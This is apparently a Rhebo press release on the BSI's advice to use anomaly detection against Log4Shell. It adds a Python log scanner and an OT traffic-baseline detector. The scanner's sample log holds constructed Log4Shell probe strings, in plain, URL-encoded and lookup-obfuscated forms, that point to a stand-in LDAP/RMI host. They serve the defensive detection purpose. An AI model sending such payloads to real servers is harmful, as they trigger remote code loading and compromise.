Why the BSI recommends anomaly detection to identify Log4Shell-related attacks
Fast and complete security patching unlikely
»Naturally, the first priority is to update all existing Log4j libraries in the company to the most recent version. However, many companies are thus embarking on the proverbial search for the needle in the haystack,« said Rhebo CTO Martin Menschner. Companies often lack clarity over which applications use the vulnerable library. Moreover, as the BSI explicitly points out, it is not sufficient to update the Log4j library through the operating system's package management: Java applications usually ship their own copy of the library inside their application archives, and a system-wide update does not touch those copies. The BSI therefore stresses that only the respective »software manufacturers who have integrated the library into their programs [can] carry out the update.« Mitigation is further complicated by the fact that Log4j has been updated several times since the vulnerability became known, because the first fixed releases turned out to be incomplete; an installation that has been »updated« is therefore not necessarily on a fixed version.
In addition, according to the BSI, all known mitigation measures that affect the use of the library are currently based on disabling the affected functionality, i.e. the message lookups through which the JNDI injection is triggered. Systems that genuinely depend on this functionality therefore risk no longer working once the mitigation is applied. Companies providing critical services, for example operators of critical infrastructures and industrial companies, thus find themselves in a catch-22: keep the functionality and stay exposed, or disable it and risk an outage.
Companies should also not be lulled into a false sense of security after an update. »The Log4Shell vulnerability could already have been exploited in some companies. This means that adversaries might have already compromised IT or – via lateral movement – Operational Technology (OT) networks and established access via backdoors,« adds Martin Menschner. After all, the vulnerable lookup feature has been part of Log4j 2 since 2013, long before the vulnerability was disclosed. And security organizations worldwide have observed a massive increase in network scans and attacks since Log4Shell officially became known in December 2021 (see also Rhebo's commentary on Log4Shell).
Anomaly detection should be a priority
For these reasons, the BSI recommends that organizations immediately implement enhanced measures to detect suspicious and malicious communications. In addition to evaluating request data, for example by searching web server logs for exploit strings in request parameters, headers and user agents, the BSI explicitly mentions anomaly detection at the network level. »This solution not only detects previously unknown attack patterns typical of zero-day vulnerabilities,« added Martin Menschner. »It also reports operations that indicate existing compromises, such as lateral movement, scans, change of functions and command structures in systems.« Rhebo's Next Generation OT Intrusion Detection offers a solution tailored specifically to Operational Technology networks and Industrial Control Systems.
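The log evaluation the BSI recommends is harder than a simple grep for `${jndi:`, because attackers URL-encode the probe or hide the `jndi` token behind nested Log4j lookups (`${lower:j}`, `${::-j}`, `${env:MISSING:-j}`). The following detector, written as an added example for this page rather than taken from the BSI guidance or from Rhebo, normalizes each log line by URL-decoding it and collapsing those lookups from the inside out before searching for the payload. The log lines, IP addresses and timestamps are constructed; the lookup rules are a detector-side approximation of Log4j's behaviour, not its real parser.

```python
import re
import urllib.parse

# Constructed sample web server log lines (Combined Log Format); the addresses
# are documentation ranges, not real hosts. Lines 1, 3 and 4 carry Log4Shell
# probes in plain, URL-encoded and lookup-obfuscated form; lines 2 and 5 are benign.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:22:14:03 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.4 - - [10/Dec/2021:22:15:11 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" '
    '"Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:22:16:40 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3A'
    'ldap%3A%2F%2F203.0.113.9%3A1389%2Fa%7D HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '203.0.113.7 - - [10/Dec/2021:22:17:02 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.9:1099/obj}"',
    '192.0.2.5 - - [10/Dec/2021:22:18:30 +0000] "GET /docs/jndi-lookups.html HTTP/1.1" 200 8812 "-" '
    '"Mozilla/5.0"',
]

# One Log4j-style lookup with no further lookup nested inside it: ${kind:body}.
# Because the body may not contain "${", the innermost lookup always matches
# first, so repeated substitution peels the obfuscation from the inside out.
_LOOKUP = re.compile(r"\$\{(?P<kind>[A-Za-z]*):(?P<body>[^${}]*)\}")


def _resolve(m):
    """Approximate how Log4j 2 evaluates the lookups commonly used for obfuscation.
    Detector-side approximation (assumption), not the real StrSubstitutor."""
    kind, body = m.group("kind").lower(), m.group("body")
    if kind == "jndi":
        return m.group(0)                 # the payload itself: leave it for the detector
    if kind == "lower":
        return body.lower()
    if kind == "upper":
        return body.upper()
    if ":-" in body:                      # ${x:-default} / ${env:MISSING:-default} -> default
        return body.split(":-", 1)[1]
    return body                           # any other simple lookup: keep its literal body


def normalize(s, max_rounds=10):
    """URL-decode and collapse nested lookups until the string stops changing."""
    for _ in range(max_rounds):
        prev = s
        s = urllib.parse.unquote(s)       # repeated per round, so double encoding is undone too
        s = _LOOKUP.sub(_resolve, s)
        if s == prev:
            break
    return s.lower()


_JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)")


def scan_line(line):
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a probe, else None."""
    m = _JNDI.search(normalize(line))
    return m.group("scheme") if m else None


def scan_log(lines):
    """Return (line_number, scheme, client_ip) for every line that carries a probe."""
    hits = []
    for n, line in enumerate(lines, 1):
        scheme = scan_line(line)
        if scheme:
            hits.append((n, scheme, line.split(" ", 1)[0]))
    return hits


if __name__ == "__main__":
    for n, scheme, ip in scan_log(SAMPLE_LOG):
        print(f"line {n}: Log4Shell probe via {scheme} from {ip}")
```

Run it against an exported access log one line at a time; a hit only proves that a probe arrived, not that it succeeded, so the next step is to check the same host for an outbound LDAP, RMI or DNS connection at that timestamp, which is where the network-level detection discussed below comes in.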
Rhebo's OT monitoring observes all communication within an industrial network, while the integrated threat and intrusion detection identifies any anomaly, i.e. any deviation from the learned communication behavior, and reports it in real time. It detects communication that is novel or unusual in the monitored network and indicative of malicious behavior, from backdoor communications, lateral movement and spoofing activities to direct interference with industrial processes. With anomaly detection, the actions of adversaries within the OT network become visible and traceable and can be mitigated in real time, even if their tools have no known signature or they are acting through hijacked, legitimately authenticated user accounts. To get anomaly detection up and running quickly, Rhebo offers on-demand technical operational support as well as a comprehensive managed protection service. To assess whether a network compromise has already occurred, an OT risk assessment and security analysis is also recommended.
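To make concrete what »deviation from the learned communication behavior« means, the following baseline detector is an added example written for this page; it is not Rhebo's product or its detection logic. It learns the conversations of a small constructed OT segment (hosts, ports and flow records are all made up) and then flags three shapes of the post-exploitation activity described above: a known host contacting an address never seen before (the shape of a JNDI callback to an attacker's LDAP server), a new conversation between two known hosts (lateral movement), and one host sweeping many ports on another (a scan). The scan threshold is an assumed value.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: int        # constructed sample timestamp, seconds
    src: str
    dst: str
    dport: int
    proto: str


@dataclass(frozen=True)
class Alert:
    kind: str      # "new-host", "new-conversation" or "scan"
    src: str
    dst: str
    detail: str


class Baseline:
    """Whitelist-style baseline: every (src, dst, dport, proto) seen while learning is 'normal'."""

    def __init__(self):
        self.hosts = set()
        self.conversations = set()

    def learn(self, flows):
        for f in flows:
            self.hosts.update((f.src, f.dst))
            self.conversations.add((f.src, f.dst, f.dport, f.proto))

    def detect(self, flows, scan_threshold=5):
        # Pass 1: one source touching many ports on one destination is a scan.
        # Collapse it into a single alert instead of one alert per port.
        ports = defaultdict(set)
        for f in flows:
            ports[(f.src, f.dst)].add(f.dport)
        scanning = {pair for pair, p in ports.items() if len(p) >= scan_threshold}

        # Pass 2: per-flow novelty, in time order.
        alerts = []
        for f in sorted(flows, key=lambda f: f.ts):
            if (f.src, f.dst) in scanning:
                continue
            conv = (f.src, f.dst, f.dport, f.proto)
            if f.src not in self.hosts or f.dst not in self.hosts:
                alerts.append(Alert("new-host", f.src, f.dst,
                                    f"{f.dport}/{f.proto} involves an address never seen in the baseline"))
            elif conv not in self.conversations:
                alerts.append(Alert("new-conversation", f.src, f.dst,
                                    f"{f.dport}/{f.proto} between known hosts that never talked this way"))
        for src, dst in sorted(scanning):
            alerts.append(Alert("scan", src, dst, f"{len(ports[(src, dst)])} distinct ports probed"))
        return alerts


# Constructed learning-phase traffic of a small cell: HMI, engineering workstation,
# historian and one PLC. Addresses are private/documentation ranges.
LEARNING_FLOWS = [
    Flow(1, "10.0.1.10", "10.0.1.20", 502, "tcp"),     # HMI polls the PLC over Modbus/TCP
    Flow(2, "10.0.1.11", "10.0.1.20", 502, "tcp"),     # engineering workstation talks to the PLC
    Flow(3, "10.0.1.30", "10.0.1.20", 44818, "tcp"),   # historian reads the PLC over EtherNet/IP
    Flow(4, "10.0.1.10", "10.0.1.30", 443, "tcp"),     # HMI pushes data to the historian
]

# Constructed monitoring-phase traffic: two normal flows, then three anomalies.
MONITORING_FLOWS = [
    Flow(100, "10.0.1.10", "10.0.1.20", 502, "tcp"),        # normal
    Flow(101, "10.0.1.30", "10.0.1.20", 44818, "tcp"),      # normal
    Flow(102, "10.0.1.10", "203.0.113.9", 1389, "tcp"),     # HMI reaches an unknown address on an LDAP-style port
    Flow(103, "10.0.1.10", "10.0.1.11", 445, "tcp"),        # HMI opens SMB to the engineering workstation
] + [Flow(104 + i, "10.0.1.11", "10.0.1.20", p, "tcp")      # workstation sweeps ports on the PLC
     for i, p in enumerate((21, 22, 23, 80, 443, 502))]


def run_demo():
    """Learn from LEARNING_FLOWS and return the alerts raised on MONITORING_FLOWS."""
    baseline = Baseline()
    baseline.learn(LEARNING_FLOWS)
    return baseline.detect(MONITORING_FLOWS)


if __name__ == "__main__":
    for a in run_demo():
        print(f"{a.kind:17} {a.src} -> {a.dst}: {a.detail}")
```

The point of the example is the order of checks: a previously unseen peer is reported before anything else, because in a flat OT segment a PLC or HMI talking to a new address is the single strongest indicator of a successful exploit, whatever protocol or tool the adversary used.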
For more information on the Rhebo OT anomaly detection please visit https://rhebo.com/en/our-products/rhebo-industrial-protector/.
Rhebo develops and markets innovative industrial monitoring solutions and services for energy suppliers, industrial companies and critical infrastructures. The company enables its customers to guarantee both the cybersecurity and the availability of their OT and IoT infrastructures and thus to master the complex challenges of securing industrial networks and smart infrastructures. Since 2021, Rhebo has been part of Landis+Gyr AG, a leading global provider of integrated energy management solutions for the energy industry with around 5,000 employees in over 30 countries worldwide.
Rhebo is a partner of the Alliance for Cyber Security of the Federal Office for Information Security and is actively involved in Teletrust – IT Security Association Germany and Bitkom Working Group on Security Management for the development of security standards. https://rhebo.com/
Rhebo GmbH
Spinnereistr. 7
04179 Leipzig
Phone: +49 (341) 393790-180
Fax: +49 (341) 393790-0
http://www.rhebo.com
Public Relations
Phone: +49 (341) 393790191
E-Mail: jens.pacholsky@rhebo.com